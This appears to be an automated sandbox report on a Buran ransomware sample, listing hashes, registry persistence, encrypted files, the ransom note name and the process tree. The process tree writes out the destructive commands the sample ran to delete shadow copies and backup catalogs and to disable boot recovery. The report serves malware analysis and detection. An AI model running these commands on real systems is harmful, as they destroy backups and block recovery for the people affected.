Analysis
-
max time kernel
151s -
max time network
138s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
08/12/2021, 10:40
Static task
static1
Behavioral task
behavioral1
Sample
11430.scr
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
11430.scr
Resource
win10-en-20211104
General
-
Target
11430.scr
-
Size
250KB
-
MD5
d23ff582560da24dc1ff5e19f743a1df
-
SHA1
aceb66d9f24cc4ca99ed55dbe591042862a0ff07
-
SHA256
de559d54d5c796d15b9d711a216e9627bce4bcdc8c26afa72d97d8421afd7390
-
SHA512
658a59c7434661188ca7b94779fc25b2f7dc389b4690b47ecef4485284fc3747629506abe32ba154b6030dfb3983891b755ccb82aaf22924e86ac7467b31273c
Malware Config
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 3 IoCs
pid Process 4344 hgfdfds.exe 732 spoolsv.exe 1148 spoolsv.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\spoolsv.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\spoolsv.exe\" -start" hgfdfds.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run hgfdfds.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\V: spoolsv.exe File opened (read-only) \??\Q: spoolsv.exe File opened (read-only) \??\O: spoolsv.exe File opened (read-only) \??\M: spoolsv.exe File opened (read-only) \??\B: spoolsv.exe File opened (read-only) \??\A: spoolsv.exe File opened (read-only) \??\Y: spoolsv.exe File opened (read-only) \??\W: spoolsv.exe File opened (read-only) \??\S: spoolsv.exe File opened (read-only) \??\I: spoolsv.exe File opened (read-only) \??\F: spoolsv.exe File opened (read-only) \??\E: spoolsv.exe File opened (read-only) \??\Z: spoolsv.exe File opened (read-only) \??\X: spoolsv.exe File opened (read-only) \??\R: spoolsv.exe File opened (read-only) \??\N: spoolsv.exe File opened (read-only) \??\L: spoolsv.exe File opened (read-only) \??\H: spoolsv.exe File opened (read-only) \??\G: spoolsv.exe File opened (read-only) \??\U: spoolsv.exe File opened (read-only) \??\T: spoolsv.exe File opened (read-only) \??\P: spoolsv.exe File opened (read-only) \??\K: spoolsv.exe File opened (read-only) \??\J: spoolsv.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 geoiptool.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\XMLOffKeys\Keys_OffVer12.xml spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8576_24x24x32.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ul-oob.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-100_contrast-white.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OneConnectStoreLogo.scale-200.png spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-autoupdate-ui.xml.kd8eby0.2EB-F50-259 spoolsv.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-white\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar spoolsv.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Smart Tag\1033\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial2-ppd.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_Subscription-pl.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-ppd.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteAppList.targetsize-36_altform-unplated.png spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css spoolsv.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\Strike.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-48_contrast-white.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Office Theme.thmx spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial2-pl.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Awards\Assets\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files\VideoLAN\VLC\locale\te\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxManifest.xml spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-256_altform-unplated.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7205_20x20x32.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-30.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\Movie-TVStoreLogo.scale-100_contrast-black.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019MSDNR_Retail-ul-oob.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-200.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\NETWORK\THMBNAIL.PNG.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\WideTile.scale-100_contrast-white.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-pl.xrm-ms spoolsv.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_scale-200.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-oob.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\powerpointmui.msi.16.en-us.boot.tree.dat spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupSmallTile.scale-400.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteWideTile.scale-200.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-40_altform-unplated_contrast-white.png spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Retail-pl.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_Retail-ul-phn.xrm-ms spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxA-Advanced-Light.scale-100.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\OutlookMailMediumTile.scale-150.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxIdentityProvider_2016.719.1035.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\jni_md.h spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ul-oob.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\ad_16x11.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-24_altform-colorize.png spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\HeartbeatConfig.xml spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\CoreEngine\Data\BrushProfile\BrushBump64.png spoolsv.exe File created C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ci_60x42.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\xk_60x42.png spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-ms.kd8eby0.2EB-F50-259 spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\6478_24x24x32.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\LinkedInboxBadge.scale-125.png spoolsv.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2132 vssadmin.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 hgfdfds.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e hgfdfds.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1664 powershell.exe 1664 powershell.exe 1664 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4344 hgfdfds.exe Token: SeDebugPrivilege 4344 hgfdfds.exe Token: SeBackupPrivilege 4012 vssvc.exe Token: SeRestorePrivilege 4012 vssvc.exe Token: SeAuditPrivilege 4012 vssvc.exe Token: SeIncreaseQuotaPrivilege 1912 WMIC.exe Token: SeSecurityPrivilege 1912 WMIC.exe Token: SeTakeOwnershipPrivilege 1912 WMIC.exe Token: SeLoadDriverPrivilege 1912 WMIC.exe Token: SeSystemProfilePrivilege 1912 WMIC.exe Token: SeSystemtimePrivilege 1912 WMIC.exe Token: SeProfSingleProcessPrivilege 1912 WMIC.exe Token: SeIncBasePriorityPrivilege 1912 WMIC.exe Token: SeCreatePagefilePrivilege 1912 WMIC.exe Token: SeBackupPrivilege 1912 WMIC.exe Token: SeRestorePrivilege 1912 WMIC.exe Token: SeShutdownPrivilege 1912 WMIC.exe Token: SeDebugPrivilege 1912 WMIC.exe Token: SeSystemEnvironmentPrivilege 1912 WMIC.exe Token: SeRemoteShutdownPrivilege 1912 WMIC.exe Token: SeUndockPrivilege 1912 WMIC.exe Token: SeManageVolumePrivilege 1912 WMIC.exe Token: 33 1912 WMIC.exe Token: 34 1912 WMIC.exe Token: 35 1912 WMIC.exe Token: 36 1912 WMIC.exe Token: SeIncreaseQuotaPrivilege 1912 WMIC.exe Token: SeSecurityPrivilege 1912 WMIC.exe Token: SeTakeOwnershipPrivilege 1912 WMIC.exe Token: SeLoadDriverPrivilege 1912 WMIC.exe Token: SeSystemProfilePrivilege 1912 WMIC.exe Token: SeSystemtimePrivilege 1912 WMIC.exe Token: SeProfSingleProcessPrivilege 1912 WMIC.exe Token: SeIncBasePriorityPrivilege 1912 WMIC.exe Token: SeCreatePagefilePrivilege 1912 WMIC.exe Token: SeBackupPrivilege 1912 WMIC.exe Token: SeRestorePrivilege 1912 WMIC.exe Token: SeShutdownPrivilege 1912 WMIC.exe Token: SeDebugPrivilege 1912 WMIC.exe Token: SeSystemEnvironmentPrivilege 1912 WMIC.exe Token: SeRemoteShutdownPrivilege 1912 WMIC.exe Token: SeUndockPrivilege 1912 WMIC.exe Token: SeManageVolumePrivilege 1912 WMIC.exe Token: 33 1912 WMIC.exe Token: 34 1912 WMIC.exe Token: 35 1912 WMIC.exe Token: 36 1912 WMIC.exe Token: SeDebugPrivilege 1664 powershell.exe Token: SeIncreaseQuotaPrivilege 4760 WMIC.exe Token: SeSecurityPrivilege 4760 WMIC.exe Token: SeTakeOwnershipPrivilege 4760 WMIC.exe Token: SeLoadDriverPrivilege 4760 WMIC.exe Token: SeSystemProfilePrivilege 4760 WMIC.exe Token: SeSystemtimePrivilege 4760 WMIC.exe Token: SeProfSingleProcessPrivilege 4760 WMIC.exe Token: SeIncBasePriorityPrivilege 4760 WMIC.exe Token: SeCreatePagefilePrivilege 4760 WMIC.exe Token: SeBackupPrivilege 4760 WMIC.exe Token: SeRestorePrivilege 4760 WMIC.exe Token: SeShutdownPrivilege 4760 WMIC.exe Token: SeDebugPrivilege 4760 WMIC.exe Token: SeSystemEnvironmentPrivilege 4760 WMIC.exe Token: SeRemoteShutdownPrivilege 4760 WMIC.exe Token: SeUndockPrivilege 4760 WMIC.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 4476 wrote to memory of 4344 4476 11430.scr 69 PID 4476 wrote to memory of 4344 4476 11430.scr 69 PID 4476 wrote to memory of 4344 4476 11430.scr 69 PID 4344 wrote to memory of 732 4344 hgfdfds.exe 70 PID 4344 wrote to memory of 732 4344 hgfdfds.exe 70 PID 4344 wrote to memory of 732 4344 hgfdfds.exe 70 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 4344 wrote to memory of 812 4344 hgfdfds.exe 71 PID 732 wrote to memory of 4244 732 spoolsv.exe 72 PID 732 wrote to memory of 4244 732 spoolsv.exe 72 PID 732 wrote to memory of 4244 732 spoolsv.exe 72 PID 732 wrote to memory of 3248 732 spoolsv.exe 73 PID 732 wrote to memory of 3248 732 spoolsv.exe 73 PID 732 wrote to memory of 3248 732 spoolsv.exe 73 PID 732 wrote to memory of 424 732 spoolsv.exe 84 PID 732 wrote to memory of 424 732 spoolsv.exe 84 PID 732 wrote to memory of 424 732 spoolsv.exe 84 PID 732 wrote to memory of 584 732 spoolsv.exe 78 PID 732 wrote to memory of 584 732 spoolsv.exe 78 PID 732 wrote to memory of 584 732 spoolsv.exe 78 PID 732 wrote to memory of 816 732 spoolsv.exe 77 PID 732 wrote to memory of 816 732 spoolsv.exe 77 PID 732 wrote to memory of 816 732 spoolsv.exe 77 PID 732 wrote to memory of 620 732 spoolsv.exe 79 PID 732 wrote to memory of 620 732 spoolsv.exe 79 PID 732 wrote to memory of 620 732 spoolsv.exe 79 PID 732 wrote to memory of 1148 732 spoolsv.exe 80 PID 732 wrote to memory of 1148 732 spoolsv.exe 80 PID 732 wrote to memory of 1148 732 spoolsv.exe 80 PID 4244 wrote to memory of 1912 4244 cmd.exe 86 PID 4244 wrote to memory of 1912 4244 cmd.exe 86 PID 4244 wrote to memory of 1912 4244 cmd.exe 86 PID 620 wrote to memory of 1664 620 cmd.exe 85 PID 620 wrote to memory of 1664 620 cmd.exe 85 PID 620 wrote to memory of 1664 620 cmd.exe 85 PID 816 wrote to memory of 2132 816 cmd.exe 87 PID 816 wrote to memory of 2132 816 cmd.exe 87 PID 816 wrote to memory of 2132 816 cmd.exe 87 PID 620 wrote to memory of 4760 620 cmd.exe 90 PID 620 wrote to memory of 4760 620 cmd.exe 90 PID 620 wrote to memory of 4760 620 cmd.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\11430.scr"C:\Users\Admin\AppData\Local\Temp\11430.scr" /S1⤵
- Suspicious use of WriteProcessMemory
PID:4476 -
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -start3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:732 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete4⤵
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no4⤵PID:3248
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet4⤵
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:584
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat4⤵
- Suspicious use of WriteProcessMemory
PID:620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy ByPass -Command "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1664
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exeWMIC.exe shadowcopy delete /nointeractive5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\spoolsv.exe" -agent 04⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1148
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵PID:424
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:812
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4012